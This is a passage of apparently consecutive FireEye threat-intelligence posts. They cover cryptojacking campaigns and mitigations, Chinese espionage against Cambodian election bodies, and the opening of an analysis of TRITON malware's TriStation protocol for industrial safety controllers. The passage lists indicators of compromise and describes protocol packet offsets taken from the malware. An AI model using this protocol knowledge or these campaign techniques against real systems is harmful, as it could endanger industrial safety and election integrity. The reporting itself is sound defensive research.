  • In February 2018, FireEye researchers published a blog detailing various techniques actors used in order to deliver malicious miner payloads (specifically to vulnerable Oracle servers) by abusing CVE-2017-10271. Refer to our blog post for more detailed information regarding the post-exploitation and pre-mining dissemination techniques used in those campaigns.
  • In March 2018, Bleeping Computer reported on the trend of cryptocurrency mining campaigns moving to the cloud via vulnerable Docker and Kubernetes applications, which are two software tools used by developers to help scale a company's cloud infrastructure. In most cases, successful attacks occur due to misconfigured applications and/or weak security controls and passwords.
  • In February 2018, Bleeping Computer also reported on hackers who breached Tesla's cloud servers to mine Monero. Attackers identified a Kubernetes console that was not password protected, allowing them to discover login credentials for the broader Tesla Amazon Web services (AWS) S3 cloud environment. Once the attackers gained access to the AWS environment via the harvested credentials, they effectively launched their cryptojacking operations.
  • Reports of cryptojacking activity due to misconfigured AWS S3 cloud storage buckets have also been observed, as was the case in the LA Times online compromise in February 2018. The presence of vulnerable AWS S3 buckets allows anyone on the internet to access and change hosted content, including the ability to inject mining scripts or other malicious software.
Incorporation of Cryptojacking into Existing Botnets

FireEye iSIGHT Intelligence has observed multiple prominent botnets such as Dridex and Trickbot incorporate cryptocurrency mining into their existing operations. Many of these families are modular in nature and have the ability to download and execute remote files, thus allowing the operators to easily turn their infections into cryptojacking bots. While these operations have traditionally been aimed at credential theft (particularly of banking credentials), adding mining modules or downloading secondary mining payloads provides the operators another avenue to generate additional revenue with little effort. This is especially true in cases where the victims were deemed unprofitable or have already been exploited in the original scheme.

The following are some real-world examples of cryptojacking being incorporated into existing botnets:

  • In early February 2018, FireEye iSIGHT Intelligence observed Dridex botnet ID 2040 download a Monero cryptocurrency miner based on the open-source XMRig miner.
  • On Feb. 12, 2018, FireEye iSIGHT Intelligence observed the banking malware IcedID injecting Monero-mining JavaScript into webpages for specific, targeted URLs. The IcedID injects launched an anonymous miner using the mining code from Coinhive's AuthedMine.
  • In late 2017, Bleeping Computer reported that security researchers with Radware observed the hacking group CodeFork leveraging the popular downloader Andromeda (aka Gamarue) to distribute a miner module to their existing botnets.
  • In late 2017, FireEye researchers observed Trickbot operators deploy a new module named "testWormDLL" that is a statically compiled copy of the popular XMRig Monero miner.
  • On Aug. 29, 2017, Security Week reported on a variant of the popular Neutrino banking Trojan, including a Monero miner module. According to their reporting, the new variant no longer aims at stealing bank card data, but instead is limited to downloading and executing modules from a remote server.

Drive-By Cryptojacking

In-Browser

FireEye iSIGHT Intelligence has examined various customer reports of browser-based cryptocurrency mining. Browser-based mining scripts have been observed on compromised websites, third-party advertising platforms, and have been legitimately placed on websites by publishers. While coin mining scripts can be embedded directly into a webpage's source code, they are frequently loaded from third-party websites. Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers, such as in the case of a compromised website. Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors. At the time of reporting, the most popular script being deployed in the wild is Coinhive. Coinhive is an open-source JavaScript library that, when loaded on a vulnerable website, can mine Monero using the site visitor's CPU resources, unbeknownst to the user, as they browse the site.

The following are some real-world examples of Coinhive being deployed in the wild:

  • In September 2017, Bleeping Computer reported that the authors of SafeBrowse, a Chrome extension with more than 140,000 users, had embedded the Coinhive script in the extension's code that allowed for the mining of Monero using users' computers and without getting their consent.
  • During mid-September 2017, users on Reddit began complaining about increased CPU usage when they navigated to a popular torrent site, The Pirate Bay (TPB). The spike in CPU usage was a result of Coinhive's script being embedded within the site's footer. According to TPB operators, it was implemented as a test to generate passive revenue for the site (Figure 8).
  • In December 2017, researchers with Sucuri reported on the presence of the Coinhive script being hosted on GitHub.io, which allows users to publish web pages directly from GitHub repositories.
  • Other reporting disclosed the Coinhive script being embedded on the Showtime domain as well as on the LA Times website, both surreptitiously mining Monero.
  • A majority of in-browser cryptojacking activity is transitory in nature and will last only as long as the user’s web browser is open. However, researchers with Malwarebytes Labs uncovered a technique that allows for continued mining activity even after the browser window is closed. The technique leverages a pop-under window surreptitiously hidden under the taskbar. As researchers pointed out, closing the browser window may not be enough to interrupt the activity, and that more advanced actions like running the Task Manager may be required.


Figure 8: Statement from TPB operators on Coinhive script

Malvertising and Exploit Kits

Malvertisements – malicious ads on legitimate websites – commonly redirect visitors of a site to an exploit kit landing page. These landing pages are designed to scan a system for vulnerabilities, exploit those vulnerabilities, and download and execute malicious code onto the system. Notably, the malicious advertisements can be placed on legitimate sites and visitors can become infected with little to no user interaction. This distribution tactic is commonly used by threat actors to widely distribute malware and has been employed in various cryptocurrency mining operations.

The following are some real-world examples of this activity:

  • In early 2018, researchers with Trend Micro reported that a modified miner script was being disseminated across YouTube via Google's DoubleClick ad delivery platform. The script was configured to generate a random number variable between 1 and 100, and when the variable was above 10 it would launch the Coinhive script coinhive.min.js, which harnessed 80 percent of the CPU power to mine Monero. When the variable was below 10 it launched a modified Coinhive script that was also configured to harness 80 percent CPU power to mine Monero. This custom miner connected to the mining pool wss[:]//ws[.]l33tsite[.]info:8443, which was likely done to avoid Coinhive's fees.
  • In April 2018, researchers with Trend Micro also discovered a JavaScript code based on Coinhive injected into an AOL ad platform. The miner used the following private mining pools: wss[:]//wsX[.]www.datasecu[.]download/proxy and wss[:]//www[.]jqcdn[.]download:8893/proxy. Examination of other sites compromised by this campaign showed that in at least some cases the operators were hosting malicious content on unsecured AWS S3 buckets.
  • Since July 16, 2017, FireEye has observed the Neptune Exploit Kit redirect to ads for hiking clubs and MP3 converter domains. Payloads associated with the latter include Monero CPU miners that are surreptitiously installed on victims' computers.
  • In January 2018, Check Point researchers discovered a malvertising campaign leading to the Rig Exploit Kit, which served the XMRig Monero miner utility to unsuspecting victims.

Mobile Cryptojacking

In addition to targeting enterprise servers and user machines, threat actors have also targeted mobile devices for cryptojacking operations. While this technique is less common, likely due to the limited processing power afforded by mobile devices, cryptojacking on mobile devices remains a threat as sustained power consumption can damage the device and dramatically shorten the battery life. Threat actors have been observed targeting mobile devices by hosting malicious cryptojacking apps on popular app stores and through drive-by malvertising campaigns that identify users of mobile browsers.

The following are some real-world examples of mobile devices being used for cryptojacking:

  • During 2014, FireEye iSIGHT Intelligence reported on multiple Android malware apps capable of mining cryptocurrency:
    • In March 2014, Android malware named "CoinKrypt" was discovered, which mined Litecoin, Dogecoin, and CasinoCoin currencies.
    • In March 2014, another form of Android malware – "Android.Trojan.MuchSad.A" or "ANDROIDOS_KAGECOIN.HBT" – was observed mining Bitcoin, Litecoin, and Dogecoin currencies. The malware was disguised as copies of popular applications, including "Football Manager Handheld" and "TuneIn Radio." Variants of this malware have reportedly been downloaded by millions of Google Play users.
    • In April 2014, Android malware named "BadLepricon," which mined Bitcoin, was identified. The malware was reportedly being bundled into wallpaper applications hosted on the Google Play store, at least several of which received 100 to 500 installations before being removed.
    • In October 2014, a type of mobile malware called "Android Slave" was observed in China; the malware was reportedly capable of mining multiple virtual currencies.
  • In December 2017, researchers with Kaspersky Labs reported on a new multi-faceted Android malware capable of a variety of actions including mining cryptocurrencies and launching DDoS attacks. The resource load created by the malware has reportedly been high enough that it can cause the battery to bulge and physically destroy the device. The malware, dubbed Loapi, is unique in the breadth of its potential actions. It has a modular framework that includes modules for malicious advertising, texting, web crawling, Monero mining, and other activities. Loapi is thought to be the work of the same developers behind the 2015 Android malware Podec, and is usually disguised as an anti-virus app.
  • In January 2018, SophosLabs released a report detailing their discovery of 19 mobile apps hosted on Google Play that contained embedded Coinhive-based cryptojacking code, some of which were downloaded anywhere from 100,000 to 500,000 times.
  • Between November 2017 and January 2018, researchers with Malwarebytes Labs reported on a drive-by cryptojacking campaign that affected millions of Android mobile browsers to mine Monero.

Cryptojacking Spam Campaigns

FireEye iSIGHT Intelligence has observed several cryptocurrency miners distributed via spam campaigns, which is a commonly used tactic to indiscriminately distribute malware. We expect malicious actors will continue to use this method to disseminate cryptojacking code as for long as cryptocurrency mining remains profitable.

In late November 2017, FireEye researchers identified a spam campaign delivering a malicious PDF attachment designed to appear as a legitimate invoice from the largest port and container service in New Zealand: Lyttelton Port of Chistchurch (Figure 9). Once opened, the PDF would launch a PowerShell script that downloaded a Monero miner from a remote host. The malicious miner connected to the pools supportxmr.com and nanopool.org.


Figure 9: Sample lure attachment (PDF) that downloads malicious cryptocurrency miner

Additionally, a massive cryptojacking spam campaign was discovered by FireEye researchers during January 2018 that was designed to look like legitimate financial services-related emails. The spam email directed victims to an infection link that ultimately dropped a malicious ZIP file onto the victim's machine. Contained within the ZIP file was a cryptocurrency miner utility (MD5: 80b8a2d705d5b21718a6e6efe531d493) configured to mine Monero and connect to the minergate.com pool. While each of the spam email lures and associated ZIP filenames were different, the same cryptocurrency miner sample was dropped across all observed instances (Table 2).

ZIP Filenames

california_540_tax_form_2013_instructions.exe

state_bank_of_india_money_transfer_agency.exe

format_transfer_sms_banking_bni_ke_bca.exe

confirmation_receipt_letter_sample.exe

sbi_online_apply_2015_po.exe

estimated_tax_payment_coupon_irs.exe

how_to_add_a_non_us_bank_account_to_paypal.exe

western_union_money_transfer_from_uk_to_bangladesh.exe

can_i_transfer_money_from_bank_of_ireland_to_aib_online.exe

how_to_open_a_business_bank_account_with_bad_credit_history.exe

apply_for_sbi_credit_card_online.exe

list_of_lucky_winners_in_dda_housing_scheme_2014.exe

Table 2: Sampling of observed ZIP filenames delivering cryptocurrency miner

Cryptojacking Worms

Following the WannaCry attacks, actors began to increasingly incorporate self-propagating functionality within their malware. Some of the observed self-spreading techniques have included copying to removable drives, brute forcing SSH logins, and leveraging the leaked NSA exploit EternalBlue. Cryptocurrency mining operations significantly benefit from this functionality since wider distribution of the malware multiplies the amount of CPU resources available to them for mining. Consequently, we expect that additional actors will continue to develop this capability.

The following are some real-world examples of cryptojacking worms:

  • In May 2017, Proofpoint reported a large campaign distributing mining malware "Adylkuzz." This cryptocurrency miner was observed leveraging the EternalBlue exploit to rapidly spread itself over corporate LANs and wireless networks. This activity included the use of the DoublePulsar backdoor to download Adylkuzz. Adylkuzz infections create botnets of Windows computers that focus on mining Monero.
  • Security researchers with Sensors identified a Monero miner worm, dubbed "Rarogminer," in April 2018 that would copy itself to removable drives each time a user inserted a flash drive or external HDD.
  • In January 2018, researchers at F5 discovered a new Monero cryptomining botnet that targets Linux machines. PyCryptoMiner is based on Python script and spreads via the SSH protocol. The bot can also use Pastebin for its command and control (C2) infrastructure. The malware spreads by trying to guess the SSH login credentials of target Linux systems. Once that is achieved, the bot deploys a simple base64-encoded Python script that connects to the C2 server to download and execute more malicious Python code.

Detection Avoidance Methods

Another trend worth noting is the use of proxies to avoid detection. The implementation of mining proxies presents an attractive option for cyber criminals because it allows them to avoid developer and commission fees of 30 percent or more. Avoiding the use of common cryptojacking services such as Coinhive, Cryptloot, and Deepminer, and instead hosting cryptojacking scripts on actor-controlled infrastructure, can circumvent many of the common strategies taken to block this activity via domain or file name blacklisting.

In March 2018, Bleeping Computer reported on the use of cryptojacking proxy servers and determined that as the use of cryptojacking proxy services increases, the effectiveness of ad blockers and browser extensions that rely on blacklists decreases significantly.

Several mining proxy tools can be found on GitHub, such as the XMRig Proxy tool, which greatly reduces the number of active pool connections, and the CoinHive Stratum Mining Proxy, which uses Coinhive’s JavaScript mining library to provide an alternative to using official Coinhive scripts and infrastructure.

In addition to using proxies, actors may also establish their own self-hosted miner apps, either on private servers or cloud-based servers that supports Node.js. Although private servers may provide some benefit over using a commercial mining service, they are still subject to easy blacklisting and require more operational effort to maintain. According to Sucuri researchers, cloud-based servers provide many benefits to actors looking to host their own mining applications, including:

  • Available free or at low-cost
  • No maintenance, just upload the crypto-miner app
  • Harder to block as blacklisting the host address could potentially impact access to legitimate services
  • Resilient to permanent takedown as new hosting accounts can more easily be created using disposable accounts

The combination of proxies and crypto-miners hosted on actor-controlled cloud infrastructure presents a significant hurdle to security professionals, as both make cryptojacking operations more difficult to detect and take down.

Mining Victim Demographics

Based on data from FireEye detection technologies, the detection of cryptocurrency miner malware has increased significantly since the beginning of 2018 (Figure 10), with the most popular mining pools being minergate and nanopool (Figure 11), and the most heavily affected country being the U.S. (Figure 12). Consistent with other reporting, the education sector remains most affected, likely due to more relaxed security controls across university networks and students taking advantage of free electricity to mine cryptocurrencies (Figure 13).


Figure 10: Cryptocurrency miner detection activity per month


Figure 11: Commonly observed pools and associated ports


Figure 12: Top 10 affected countries


Figure 13: Top five affected industries


Figure 14: Top affected industries by country

Mitigation Techniques

Unencrypted Stratum Sessions

According to security researchers at Cato Networks, in order for a miner to participate in pool mining, the infected machine will have to run native or JavaScript-based code that uses the Stratum protocol over TCP or HTTP/S. The Stratum protocol uses a publish/subscribe architecture where clients will send subscription requests to join a pool and servers will send messages (publish) to its subscribed clients. These messages are simple, readable, JSON-RPC messages. Subscription requests will include the following entities: id, method, and params (Figure 15). A deep packet inspection (DPI) engine can be configured to look for these parameters in order to block Stratum over unencrypted TCP.


Figure 15: Stratum subscription request parameters

Encrypted Stratum Sessions

In the case of JavaScript-based miners running Stratum over HTTPS, detection is more difficult for DPI engines that do not decrypt TLS traffic. To mitigate encrypted mining traffic on a network, organizations may blacklist the IP addresses and domains of popular mining pools. However, the downside to this is identifying and updating the blacklist, as locating a reliable and continually updated list of popular mining pools can prove difficult and time consuming.

Browser-Based Sessions

Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers (as in the case of a compromised website). Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors.

As defenses evolve to prevent unauthorized coin mining activities, so will the techniques used by actors; however, blocking some of the most common indicators that we have observed to date may be effective in combatting a significant amount of the CPU-draining mining activities that customers have reported. Generic detection strategies for browser-based cryptocurrency mining include:

  • Blocking domains known to have hosted coin mining scripts
  • Blocking websites of known mining project websites, such as Coinhive
  • Blocking scripts altogether
  • Using an ad-blocker or coin mining-specific browser add-ons
  • Detecting commonly used naming conventions
  • Alerting and blocking traffic destined for known popular mining pools

Some of these detection strategies may also be of use in blocking some mining functionality included in existing financial malware as well as mining-specific malware families.

It is important to note that JavaScript used in browser-based cryptojacking activity cannot access files on disk. However, if a host has inadvertently navigated to a website hosting mining scripts, we recommend purging cache and other browser data.

Outlook

In underground communities and marketplaces there has been significant interest in cryptojacking operations, and numerous campaigns have been observed and reported by security researchers. These developments demonstrate the continued upward trend of threat actors conducting cryptocurrency mining operations, which we expect to see a continued focus on throughout 2018. Notably, malicious cryptocurrency mining may be seen as preferable due to the perception that it does not attract as much attention from law enforcement as compared to other forms of fraud or theft. Further, victims may not realize their computer is infected beyond a slowdown in system performance.

Due to its inherent privacy-focused features and CPU-mining profitability, Monero has become one of the most attractive cryptocurrency options for cyber criminals. We believe that it will continue to be threat actors' primary cryptocurrency of choice, so long as the Monero blockchain maintains privacy-focused standards and is ASIC-resistant. If in the future the Monero protocol ever downgrades its security and privacy-focused features, then we assess with high confidence that threat actors will move to use another privacy-focused coin as an alternative.

Because of the anonymity associated with the Monero cryptocurrency and electronic wallets, as well as the availability of numerous cryptocurrency exchanges and tumblers, attribution of malicious cryptocurrency mining is very challenging for authorities, and malicious actors behind such operations typically remain unidentified. Threat actors will undoubtedly continue to demonstrate high interest in malicious cryptomining so long as it remains profitable and relatively low risk.

Chinese Espionage Group TEMP.Periscope Targets Cambodia Ahead of July 2018 Elections and Reveals Broad Operations Globally

Introduction

FireEye has examined a range of TEMP.Periscope activity revealing extensive interest in Cambodia's politics, with active compromises of multiple Cambodian entities related to the country’s electoral system. This includes compromises of Cambodian government entities charged with overseeing the elections, as well as the targeting of opposition figures. This campaign occurs in the run up to the country’s July 29, 2018, general elections. TEMP.Periscope used the same infrastructure for a range of activity against other more traditional targets, including the defense industrial base in the United States and a chemical company based in Europe. Our previous blog post focused on the group’s targeting of engineering and maritime entities in the United States.

Overall, this activity indicates that the group maintains an extensive intrusion architecture and wide array of malicious tools, and targets a large victim set, which is in line with typical Chinese-based APT efforts. We expect this activity to provide the Chinese government with widespread visibility into Cambodian elections and government operations. Additionally, this group is clearly able to run several large-scale intrusions concurrently across a wide range of victim types.

Our analysis also strengthened our overall attribution of this group. We observed the toolsets we previously attributed to this group, their observed targets are in line with past group efforts and also highly similar to known Chinese APT efforts, and we identified an IP address originating in Hainan, China that was used to remotely access and administer a command and control (C2) server.

TEMP.Periscope Background

Active since at least 2013, TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals, including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities (targeting is summarized in Figure 1). The group has also targeted professional/consulting services, high-tech industry, healthcare, and media/publishing. TEMP.Periscope overlaps in targeting, as well as tactics, techniques, and procedures (TTPs), with TEMP.Jumper, a group that also overlaps significantly with public reporting by Proofpoint and F-Secure on "NanHaiShu."


Figure 1: Summary of TEMP.Periscope activity

Incident Background

FireEye analyzed files on three open indexes believed to be controlled by TEMP.Periscope, which yielded insight into the group's objectives, operational tactics, and a significant amount of technical attribution/validation. These files were "open indexed" and thus accessible to anyone on the public internet. This TEMP.Periscope activity on these servers extends from at least April 2017 to the present, with the most current operations focusing on Cambodia's government and elections.

  • Two servers, chemscalere[.]com and scsnewstoday[.]com, operate as typical C2 servers and hosting sites, while the third, mlcdailynews[.]com, functions as an active SCANBOX server. The C2 servers contained both logs and malware.
  • Analysis of logs from the three servers revealed:
    • Potential actor logins from an IP address located in Hainan, China that was used to remotely access and administer the servers, and interact with malware deployed at victim organizations.
    • Malware command and control check-ins from victim organizations in the education, aviation, chemical, defense, government, maritime, and technology sectors across multiple regions. FireEye has notified all of the victims that we were able to identify.
  • The malware present on the servers included both new families (DADBOD, EVILTECH) and previously identified malware families (AIRBREAK, EVILTECH, HOMEFRY, MURKYTOP, HTRAN, and SCANBOX) .

Compromises of Cambodian Election Entities

Analysis of command and control logs on the servers revealed compromises of multiple Cambodian entities, primarily those relating to the upcoming July 2018 elections. In addition, a separate spear phishing email analyzed by FireEye indicates concurrent targeting of opposition figures within Cambodia by TEMP.Periscope.

Analysis indicated that the following Cambodian government organizations and individuals were compromised by TEMP.Periscope:

  • National Election Commission, Ministry of the Interior, Ministry of Foreign Affairs and International Cooperation, Cambodian Senate, Ministry of Economics and Finance
  • Member of Parliament representing Cambodia National Rescue Party
  • Multiple Cambodians advocating human rights and democracy who have written critically of the current ruling party
  • Two Cambodian diplomats serving overseas
  • Multiple Cambodian media entities

TEMP.Periscope sent a spear phish with AIRBREAK malware to Monovithya Kem, Deputy Director-General, Public Affairs, Cambodia National Rescue Party (CNRP), and the daughter of (imprisoned) Cambodian opposition party leader Kem Sokha (Figure 2). The decoy document purports to come from LICADHO (a non-governmental organization [NGO] in Cambodia established in 1992 to promote human rights). This sample leveraged scsnewstoday[.]com for C2.


Figure 2: Human right protection survey lure

The decoy document "Interview Questions.docx" (MD5: ba1e5b539c3ae21c756c48a8b5281b7e) is tied to AIRBREAK downloaders of the same name. The questions reference the opposition Cambodian National Rescue Party, human rights, and the election (Figure 3).


Figure 3: Interview questions decoy

Infrastructure Also Used for Operations Against Private Companies

The aforementioned malicious infrastructure was also used against private companies in Asia, Europe and North America. These companies are in a wide range of industries, including academics, aviation, chemical, maritime, and technology. A MURKYTOP sample from 2017 and data contained in a file linked to chemscalere[.]com suggest that a corporation involved in the U.S. defense industrial base (DIB) industry, possibly related to maritime research, was compromised. Many of these compromises are in line with TEMP.Periscope’s previous activity targeting maritime and defense industries. However, we also uncovered the compromise of a European chemical company with a presence in Asia, demonstrating that this group is a threat to business worldwide, particularly those with ties to Asia.

AIRBREAK Downloaders and Droppers Reveal Lure Indicators

Filenames for AIRBREAK downloaders found on the open indexed sites also suggest the ongoing targeting of interests associated with Asian geopolitics. In addition, analysis of AIRBREAK downloader sites revealed a related server that underscores TEMP.Periscope's interest in Cambodian politics.

The AIRBREAK downloaders in Table 1 redirect intended victims to the indicated sites to display a legitimate decoy document while downloading an AIRBREAK payload from one of the identified C2s. Of note, the hosting site for the legitimate documents was not compromised. An additional C2 domain, partyforumseasia[.]com, was identified as the callback for an AIRBREAK downloader referencing the Cambodian National Rescue Party.

Redirect Site (Not Malicious)

AIRBREAK Downloader

AIRBREAK C2

en.freshnewsasia.com/index.php/en/8623-2018-04-26-10-12-46.html

TOP_NEWS_Japan_to_Support_the_Election.js

(3c51c89078139337c2c92e084bb0904c) [Figure 4]

chemscalere[.]com

iric.gov.kh/LICADHO/Interview-Questions.pdf

[pdf]Interview-Questions.pdf.js

(e413b45a04bf5f812912772f4a14650f)

iric.gov.kh/LICADHO/Interview-Questions.pdf

[docx]Interview-Questions.docx.js

(cf027a4829c9364d40dcab3f14c1f6b7)

unknown

Interview_Questions.docx.js

(c8fdd2b2ddec970fa69272fdf5ee86cc)

scsnewstoday[.]com

atimes.com/article/philippines-draws-three-hard-new-lines-on-china/

Philippines-draws-three-hard-new-lines-on-china .js

(5d6ad552f1d1b5cfe99ddb0e2bb51fd7)

mlcdailynews[.]com

facebook.com/CNR.Movement/videos/190313618267633/

CNR.Movement.mp4.js

(217d40ccd91160c152e5fce0143b16ef)

Partyforumseasia[.]com

 

Table 1: AIRBREAK downloaders


Figure 4: Decoy document associated with AIRBREAK downloader file TOP_NEWS_Japan_to_Support_the_Election.js

SCANBOX Activity Gives Hints to Future Operations

The active SCANBOX server, mlcdailynews[.]com, is hosting articles related to the current Cambodian campaign and broader operations. Articles found on the server indicate targeting of those with interests in U.S.-East Asia geopolitics, Russia and NATO affairs. Victims are likely either brought to the SCANBOX server via strategic website compromise or malicious links in targeted emails with the article presented as decoy material. The articles come from open-source reporting readily available online. Figure 5 is a SCANBOX welcome page and Table 2 is a list of the articles found on the server.


Figure 5: SCANBOX welcome page

Copied Article Topic

Article Source (Not Compromised)

Leaders confident yet nervous

Khmer Times

Mahathir_ 'We want to be friendly with China

PM urges voters to support CPP for peace

CPP determined to maintain Kingdom's peace and development

Bun Chhay's wife dies at 60

Crackdown planned on boycott callers

Further floods coming to Kingdom

Kem Sokha again denied bail

PM vows to stay on as premier to quash traitors

Iran_ Don't trust Trump

Fresh News

Kim-Trump summit_ Singapore's role

Trump's North Korea summit may bring peace declaration - but at a cost

Reuters

U.S. pushes NATO to ready more forces to deter Russian threat

us-nato-russia_us-pushes-nato-to-ready-more-forces-to-deter-russian-threat

Interior Minister Sar Kheng warns of dirty tricks

Phnom Penh Post

Another player to enter market for cashless pay

Donald Trump says he has 'absolute right' to pardon himself but he's done nothing wrong - Donald Trump's America

ABC News

China-funded national road inaugurated in Cambodia

The Cambodia Daily

Kim and Trump in first summit session in Singapore

Asia Times

U.S. to suspend military exercises with South Korea, Trump says

U.S. News

Rainsy defamed the King_ Hun Sen

BREAKING NEWS

cambodia-opposition-leader-denied-bail-again-in-treason-case

Associated Press

Table 2: SCANBOX articles copied to server

TEMP.Periscope Malware Suite

Analysis of the malware inventory contained on the three servers found a classic suite of TEMP.Periscope payloads, including the signature AIRBREAK, MURKYTOP, and HOMEFRY. In addition, FireEye’s analysis identified new tools, EVILTECH and DADBOD (Table 3).

Malware

Function

Details

EVILTECH

Backdoor

  • EVILTECH is a JavaScript sample that implements a simple RAT with support for uploading, downloading, and running arbitrary JavaScript.
  • During the infection process, EVILTECH is run on the system, which then causes a redirect and possibly the download of additional malware or connection to another attacker-controlled system.

DADBOD

Credential Theft

  • DADBOD is a tool used to steal user cookies.
  • Analysis of this malware is still ongoing.

Table 3: New additions to the TEMP.Periscope malware suite

Data from Logs Strengthens Attribution to China

Our analysis of the servers and surrounding data in this latest campaign bolsters our previous assessment that TEMP.Periscope is likely Chinese in origin. Data from a control panel access log indicates that operators are based in China and are operating on computers with Chinese language settings.

A log on the server revealed IP addresses that had been used to log in to the software used to communicate with malware on victim machines. One of the IP addresses, 112.66.188.28, is located in Hainan, China. Other addresses belong to virtual private servers, but artifacts indicate that the computers used to log in all cases are configured with Chinese language settings.

Outlook and Implications

The activity uncovered here offers new insight into TEMP.Periscope’s activity. We were previously aware of this actor’s interest in maritime affairs, but this compromise gives additional indications that it will target the political system of strategically important countries. Notably, Cambodia has served as a reliable supporter of China’s South China Sea position in international forums such as ASEAN and is an important partner. While Cambodia is rated as Authoritarian by the Economist’s Democracy Index, the recent surprise upset of the ruling party in Malaysia may motivate China to closely monitor Cambodia’s July 29 elections.

The targeting of the election commission is particularly significant, given the critical role it plays in facilitating voting. There is not yet enough information to determine why the organization was compromised – simply gathering intelligence or as part of a more complex operation. Regardless, this incident is the most recent example of aggressive nation-state intelligence collection on election processes worldwide.

We expect TEMP.Periscope to continue targeting a wide range of government and military agencies, international organizations, and private industry. However focused this group may be on maritime issues, several incidents underscore their broad reach, which has included European firms doing business in Southeast Asia and the internal affairs of littoral nations. FireEye expects TEMP.Periscope will remain a virulent threat for those operating in the area for the foreseeable future.

A Totally Tubular Treatise on TRITON and TriStation

Introduction

In December 2017, FireEye's Mandiant discussed an incident response involving the TRITON framework. The TRITON attack and many of the publicly discussed ICS intrusions involved routine techniques where the threat actors used only what is necessary to succeed in their mission. For both INDUSTROYER and TRITON, the attackers moved from the IT network to the OT (operational technology) network through systems that were accessible to both environments. Traditional malware backdoors, Mimikatz distillates, remote desktop sessions, and other well-documented, easily-detected attack methods were used throughout these intrusions.

Despite the routine techniques employed to gain access to an OT environment, the threat actors behind the TRITON malware framework invested significant time learning about the Triconex Safety Instrumented System (SIS) controllers and TriStation, a proprietary network communications protocol. The investment and purpose of the Triconex SIS controllers leads Mandiant to assess the attacker's objective was likely to build the capability to cause physical consequences.

TriStation remains closed source and there is no official public information detailing the structure of the protocol, raising several questions about how the TRITON framework was developed. Did the actor have access to a Triconex controller and TriStation 1131 software suite? When did development first start? How did the threat actor reverse engineer the protocol, and to what extent? What is the protocol structure?

FireEye’s Advanced Practices Team was born to investigate adversary methodologies, and to answer these types of questions, so we started with a deeper look at the TRITON’s own Python scripts.

Glossary:

  • TRITON – Malware framework designed to operate Triconex SIS controllers via the TriStation protocol.
  • TriStation – UDP network protocol specific to Triconex controllers.
  • TRITON threat actor – The human beings who developed, deployed and/or operated TRITON.

Diving into TRITON's Implementation of TriStation

TriStation is a proprietary network protocol and there is no public documentation detailing its structure or how to create software applications that use TriStation. The current TriStation UDP/IP protocol is little understood, but natively implemented through the TriStation 1131 software suite. TriStation operates by UDP over port 1502 and allows for communications between designated masters (PCs with the software that are “engineering workstations”) and slaves (Triconex controllers with special communications modules) over a network.

To us, the Triconex systems, software and associated terminology sound foreign and complicated, and the TriStation protocol is no different. Attempting to understand the protocol from ground zero would take a considerable amount of time and reverse engineering effort – so why not learn from TRITON itself? With the TRITON framework containing TriStation communication functionality, we pursued studying the framework to better understand this mysterious protocol. Work smarter, not harder, amirite?

The TRITON framework has a multitude of functionalities, but we started with the basic components:

  • TS_cnames.pyc # Compiled at: 2017-08-03 10:52:33
  • TsBase.pyc # Compiled at: 2017-08-03 10:52:33
  • TsHi.pyc # Compiled at: 2017-08-04 02:04:01
  • TsLow.pyc # Compiled at: 2017-08-03 10:46:51

TsLow.pyc (Figure 1) contains several pieces of code for error handling, but these also present some cues to the protocol structure.


Figure 1: TsLow.pyc function print_last_error()

In the TsLow.pyc’s function for print_last_error we see error handling for “TCM Error”. This compares the TriStation packet value at offset 0 with a value in a corresponding array from TS_cnames.pyc (Figure 2), which is largely used as a “dictionary” for the protocol.


Figure 2: TS_cnames.pyc TS_cst array

From this we can infer that offset 0 of the TriStation protocol contains message types. This is supported by an additional function, tcm_result, which declares type, size = struct.unpack('<HH', data_received[0:4]), stating that the first two bytes should be handled as integer type and the second two bytes are integer size of the TriStation message. This is our first glimpse into what the threat actor(s) understood about the TriStation protocol.

Since there are only 11 defined message types, it really doesn't matter much if the type is one byte or two because the second byte will always be 0x00.

We also have indications that message type 5 is for all Execution Command Requests and Responses, so it is curious to observe that the TRITON developers called this “Command Reply.” (We won’t understand this naming convention until later.)

Next we examine TsLow.pyc’s print_last_error function (Figure 3) to look at “TS Error” and “TS_names.” We begin by looking at the ts_err variable and see that it references ts_result.


Figure 3: TsLow.pyc function print_last_error() with ts_err highlighted

We follow that thread to ts_result, which defines a few variables in the next 10 bytes (Figure 4): dir, cid, cmd, cnt, unk, cks, siz = struct.unpack('<, ts_packet[0:10]). Now things are heating up. What fun. There’s a lot to unpack here, but the most interesting thing is how this piece script breaks down 10 bytes from ts_packet into different variables.


Figure 4: ts_result with ts_packet header variables highlighted


Figure 5: tcm_result

Referencing tcm_result (Figure 5) we see that it defines type and size as the first four bytes (offset 0 – 3) and tcm_result returns the packet bytes 4:-2 (offset 4 to the end minus 2, because the last two bytes are the CRC-16 checksum). Now that we know where tcm_result leaves off, we know that the ts_reply “cmd” is a single byte at offset 6, and corresponds to the values in the TS_cnames.pyc array and TS_names (Figure 6). The TRITON script also tells us that any integer value over 100 is a likely “command reply.” Sweet.

When looking back at the ts_result packet header definitions, we begin to see some gaps in the TRITON developer's knowledge: dir, cid, cmd, cnt, unk, cks, siz = struct.unpack('<, ts_packet[0:10]). We're clearly speculating based on naming conventions, but we get an impression that offsets 4, 5 and 6 could be "direction", "controller ID" and "command", respectively. Values such as "unk" show that the developer either did not know or did not care to identify this value. We suspect it is a constant, but this value is still unknown to us.


Figure 6: Excerpt TS_cnames.pyc TS_names array, which contain TRITON actor’s notes for execution command function codes

TriStation Protocol Packet Structure

The TRITON threat actor’s knowledge and reverse engineering effort provides us a better understanding of the protocol. From here we can start to form a more complete picture and document the basic functionality of TriStation. We are primarily interested in message type 5, Execution Command, which best illustrates the overall structure of the protocol. Other, smaller message types will have varying structure.


Figure 7: Sample TriStation "Allocate Program" Execution Command, with color annotation and protocol legend

Corroborating the TriStation Analysis

